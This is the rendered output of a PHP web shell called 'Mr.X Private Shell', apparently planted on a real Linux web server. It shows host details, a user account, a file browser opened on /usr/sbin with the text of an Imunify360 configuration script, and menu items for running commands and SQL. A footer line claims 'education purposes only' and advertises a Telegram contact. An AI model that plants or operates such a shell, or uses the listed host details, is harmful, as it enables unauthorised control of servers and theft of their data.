Uname: Linux server.digisquadtech.com 4.18.0-553.100.1.el8_10.x86_64 #1 SMP Mon Feb 2 04:13:33 EST 2026 x86_64
User: 1091 (madhavfluid)
Group: 1090 (madhavfluid)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//usr/////sbin/      ( Reset | Go to )
File Name: imunify-auditd-log-reader-cfg-reload
#!/usr/bin/bash

# This script copies is responsible for install auditd-log-reader configuration file
# received from imunify360 agent.
# It is assumed that imunify360 agent will trigger this script each time new configuration file is deployed.

SRC=/var/imunify360/files/auditd-log-reader/v1/config.yaml
DEST=/etc/imunify-auditd-log-reader/config.yaml

mkdir -p dir $(dirname $DEST)
cp -f $SRC $DEST

systemctl restart imunify-auditd-log-reader

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL